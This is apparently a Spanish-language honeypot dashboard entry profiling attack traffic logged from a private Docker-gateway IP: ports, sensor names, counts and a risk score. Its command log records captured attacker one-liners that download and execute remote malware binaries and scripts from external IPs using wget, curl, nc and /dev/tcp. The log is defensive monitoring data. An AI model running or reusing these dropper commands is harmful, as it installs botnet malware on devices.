Amenaza Activa • CRITICO
172.18.0.1
Pais de Origen
Primera Deteccion: 29/12/2025
Ultima Actividad: 22/2/2026
ISP: -
🎯
11.447
Ataques Totales
🔌
10
Puertos
📡
7
Tipos Ataque
🦠
6
Malware
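Geolocalizacion
- Pais: -
- Ciudad: Desconocida
- ASN: -
- ISP: -

Nota: 172.18.0.1 pertenece al rango privado 172.16.0.0/12 (RFC 1918), por lo que no es geolocalizable y los campos de país, ASN e ISP quedan vacíos. Una dirección de este tipo suele ser la puerta de enlace de una red bridge de Docker; si es el caso, este registro agrupa tráfico de múltiples orígenes externos cuya IP real se perdió por NAT, y ni los totales ni la puntuación deben atribuirse a un único atacante ni usarse esta IP como indicador de bloqueo.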
Tipos de Ataque (nombre del sensor honeypot que registró el evento, no la técnica empleada)
sentrypeer
adbhoney
dionaea
miniprint
tanner
conpot
dicompot
Puertos Atacados
21, 80, 161, 445, 1723, 1883, 3306, 5060, 5555, 9100
Malware Asociado
Comandos Ejecutados
$ getprop
  (1157x)
$ getprop ro.build.version.sdk
  (360x)
$ tcpdump -D
  (360x)
$ echo hello
  (116x)
$ cd /data/local/tmp/; busybox wget http://91.92.241.197:8080/bins/w.sh; sh w.sh; curl http://91.92.241.197:8080/bins/c.sh; sh c.sh; wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:8080/bins/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:8080/bins/wget.sh; sh wget.sh
  (58x)
$ cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null
  (45x)
$ echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
  (31x)
$ pm path com.ufo.miner
  (28x)
$ cd /data/local/tmp/; busybox wget http://91.92.241.197:5124/2/w.sh; sh w.sh; curl http://91.92.241.197:5124/2/c.sh; sh c.sh; wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox wget http://91.92.241.197:5124/2/wget.sh; sh wget.sh; busybox curl http://91.92.241.197:5124/2/wget.sh; sh wget.sh
  (24x)
$ cd /data/local/tmp/; wget http://130.12.180.78/manji.arm7 -O manji.arm7 || busybox wget http://130.12.180.78/manji.arm7 -O manji.arm7; chmod 777 manji.arm7; ./manji.arm7 || wget http://130.12.180.78/manji.mips -O manji.mips || busybox wget http://130.12.180.78/manji.mips -O manji.mips; chmod 777 manji.mips; ./manji.mips
  (11x)

Evaluacion de Riesgo
95/100
Escala: Bajo | Medio | Alto | Critico